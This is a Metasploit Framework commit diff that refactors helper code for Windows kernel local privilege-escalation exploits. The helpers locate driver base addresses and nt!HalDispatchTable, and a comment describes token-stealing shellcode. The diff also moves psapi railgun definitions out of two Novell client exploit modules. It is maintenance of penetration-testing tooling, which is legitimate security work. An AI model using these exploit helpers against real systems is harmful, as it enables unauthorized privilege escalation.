Implement improvements based on feedback

zeroSteiner · zeroSteiner · commit b602e4745410 · 2014-08-05T21:24:37.000-07:00
diff --git a/lib/msf/core/exploit/local/windows_kernel.rb b/lib/msf/core/exploit/local/windows_kernel.rb
@@ -2,6 +2,9 @@
 
 module Msf
 module Exploit::Local::WindowsKernel
+  include Msf::PostMixin
+  include Msf::Post::Windows::Error
+
   #
   # Find the address of nt!HalDispatchTable.
   #
@@ -10,25 +13,29 @@ module Exploit::Local::WindowsKernel
   #
   def find_haldispatchtable
     kernel_info = find_sys_base(nil)
+    if kernel_info.nil?
+      print_error("Failed to find the address of the Windows kernel")
+      return nil
+    end
     vprint_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}")
 
     h_kernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
     if h_kernel['return'] == 0
-      print_error("Failed to load #{kernel_info[1]} (error: #{h_kernel['GetLastError']})")
+      print_error("Failed to load #{kernel_info[1]} (error: #{h_kernel['GetLastError']} #{h_kernel['ErrorMessage']})")
       return nil
     end
     h_kernel = h_kernel['return']
 
     hal_dispatch_table = session.railgun.kernel32.GetProcAddress(h_kernel, 'HalDispatchTable')
     if hal_dispatch_table['return'] == 0
-      print_error("Failed to retrieve the address of nt!HalDispatchTable (error: #{hal_dispatch_table['GetLastError']})")
+      print_error("Failed to retrieve the address of nt!HalDispatchTable (error: #{hal_dispatch_table['GetLastError']} #{hal_dispatch_table['ErrorMessage']})")
       return nil
     end
     hal_dispatch_table = hal_dispatch_table['return']
 
     hal_dispatch_table -= h_kernel
     hal_dispatch_table += kernel_info[0]
-    vprint_status("HalDisPatchTable Address: 0x#{hal_dispatch_table.to_s(16)}")
+    vprint_status("HalDispatchTable Address: 0x#{hal_dispatch_table.to_s(16)}")
     hal_dispatch_table
   end
 
@@ -41,34 +48,31 @@ def find_haldispatchtable
   # @return [nil] If the name specified could not be found.
   #
   def find_sys_base(drvname)
-    unless session.railgun.dlls.keys.include?('psapi')
-      session.railgun.add_dll('psapi')
-      session.railgun.add_function(
-        'psapi',
-        'EnumDeviceDrivers',
-        'BOOL',
-        [
-          %w(PBLOB lpImageBase out),
-          %w(DWORD cb in),
-          %w(PDWORD lpcbNeeded out)
-        ])
-      session.railgun.add_function(
-        'psapi',
-        'GetDeviceDriverBaseNameA',
-        'DWORD',
-        [
-          %w(LPVOID ImageBase in),
-          %w(PBLOB lpBaseName out),
-          %w(DWORD nSize in)
-        ])
+    if sysinfo['Architecture'] =~ /(x86|wow64)/i
+      ptr_size = 4
+    else
+      ptr_size = 8
     end
 
-    results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
-    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack('V*')
+    results = session.railgun.psapi.EnumDeviceDrivers(0, 0, ptr_size)
+    unless results['return']
+      print_error("EnumDeviceDrivers failed (error: #{results['GetLastError']} #{results['ErrorMessage']})")
+      return nil
+    end
+    results = session.railgun.psapi.EnumDeviceDrivers(results['lpcbNeeded'], results['lpcbNeeded'], ptr_size)
+    unless results['return']
+      print_error("EnumDeviceDrivers failed (error: #{results['GetLastError']} #{results['ErrorMessage']})")
+      return nil
+    end
+    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack((ptr_size == 4 ? 'V' : 'Q') + '*')
 
     addresses.each do |address|
       results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
-      current_drvname = results['lpBaseName'][0..results['return'] - 1]
+      if results['return'] == 0
+        print_error("GetDeviceDriverBaseNameA failed (error: #{results['GetLastError']} #{results['ErrorMessage']})")
+        return nil
+      end
+      current_drvname = results['lpBaseName'][0,results['return']]
       if drvname.nil?
         if current_drvname.downcase.include?('krnl')
           return [address, current_drvname]
@@ -94,16 +98,16 @@ def find_sys_base(drvname)
   #
   def open_device(file_name, desired_access, share_mode, creation_disposition, flags_and_attributes = 0)
     handle = session.railgun.kernel32.CreateFileA(file_name, desired_access, share_mode, nil, creation_disposition, flags_and_attributes, nil)
-    if handle['return'] == 0xffffffff
-      print_error("Failed to open the #{file_name} device (error: #{handle['GetLastError']})")
+    if handle['return'] == INVALID_HANDLE_VALUE
+      print_error("Failed to open the #{file_name} device (error: #{handle['GetLastError']} #{handle['ErrorMessage']})")
       return nil
     end
     handle['return']
   end
 
   #
-  # Generate x86 token stealing shellcode suitable for use when overwriting the
-  # pointer at nt!HalDispatchTable+0x4. The shellcode preserves the edx and ebx
+  # Generate token stealing shellcode suitable for use when overwriting the
+  # HaliQuerySystemInformation pointer. The shellcode preserves the edx and ebx
   # registers.
   #
   # @param target [Hash] The target information containing the offsets to _KPROCESS,
diff --git a/lib/msf/core/post/windows/error.rb b/lib/msf/core/post/windows/error.rb
@@ -2527,5 +2527,5 @@ module Msf::Post::Windows::Error
   SYSTEM_DEVICE_NOT_FOUND = 0x3BC3
   HASH_NOT_SUPPORTED = 0x3BC4
   HASH_NOT_PRESENT = 0x3BC5
-
+  INVALID_HANDLE_VALUE = 0xffffffff
 end
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_psapi.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_psapi.rb
@@ -0,0 +1,32 @@
+# -*- coding: binary -*-
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Stdapi
+module Railgun
+module Def
+
+class Def_psapi
+
+  def self.create_dll(dll_path = 'psapi')
+    dll = DLL.new(dll_path, ApiConstants.manager)
+
+    dll.add_function('EnumDeviceDrivers', 'BOOL',[
+      %w(PBLOB lpImageBase out),
+      %w(DWORD cb in),
+      %w(PDWORD lpcbNeeded out)
+    ])
+
+    dll.add_function('GetDeviceDriverBaseNameA', 'DWORD', [
+      %w(LPVOID ImageBase in),
+      %w(PBLOB lpBaseName out),
+      %w(DWORD nSize in)
+    ])
+
+    return dll
+  end
+
+end
+
+end; end; end; end; end; end; end
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb
@@ -78,7 +78,8 @@ class Railgun
     'crypt32',
     'wlanapi',
     'wldap32',
-    'version'
+    'version',
+    'psapi'
   ].freeze
 
   ##
diff --git a/modules/exploits/windows/local/novell_client_nicm.rb b/modules/exploits/windows/local/novell_client_nicm.rb
@@ -66,28 +66,6 @@ def initialize(info={})
 
   end
 
-  def add_railgun_functions
-    session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
-    session.railgun.add_function(
-      'psapi',
-      'EnumDeviceDrivers',
-      'BOOL',
-      [
-        ["PBLOB", "lpImageBase", "out"],
-        ["DWORD", "cb", "in"],
-        ["PDWORD", "lpcbNeeded", "out"]
-      ])
-    session.railgun.add_function(
-      'psapi',
-      'GetDeviceDriverBaseNameA',
-      'DWORD',
-      [
-        ["LPVOID", "ImageBase", "in"],
-        ["PBLOB", "lpBaseName", "out"],
-        ["DWORD", "nSize", "in"]
-      ])
-  end
-
   def open_device(dev)
 
     invalid_handle_value = 0xFFFFFFFF
@@ -163,10 +141,6 @@ def check
   end
 
   def exploit
-
-    vprint_status("Adding the railgun stuff...")
-    add_railgun_functions
-
     if sysinfo["Architecture"] =~ /wow64/i
       fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
     elsif sysinfo["Architecture"] =~ /x64/
diff --git a/modules/exploits/windows/local/novell_client_nwfs.rb b/modules/exploits/windows/local/novell_client_nwfs.rb
@@ -62,28 +62,6 @@ def initialize(info={})
 
   end
 
-  def add_railgun_functions
-    session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
-    session.railgun.add_function(
-      'psapi',
-      'EnumDeviceDrivers',
-      'BOOL',
-      [
-        ["PBLOB", "lpImageBase", "out"],
-        ["DWORD", "cb", "in"],
-        ["PDWORD", "lpcbNeeded", "out"]
-      ])
-    session.railgun.add_function(
-      'psapi',
-      'GetDeviceDriverBaseNameA',
-      'DWORD',
-      [
-        ["LPVOID", "ImageBase", "in"],
-        ["PBLOB", "lpBaseName", "out"],
-        ["DWORD", "nSize", "in"]
-      ])
-  end
-
   def open_device(dev)
 
     invalid_handle_value = 0xFFFFFFFF
@@ -219,10 +197,6 @@ def disclose_addresses(t)
 
 
   def exploit
-
-    vprint_status("Adding the railgun stuff...")
-    add_railgun_functions
-
     if sysinfo["Architecture"] =~ /wow64/i
       fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
     elsif sysinfo["Architecture"] =~ /x64/
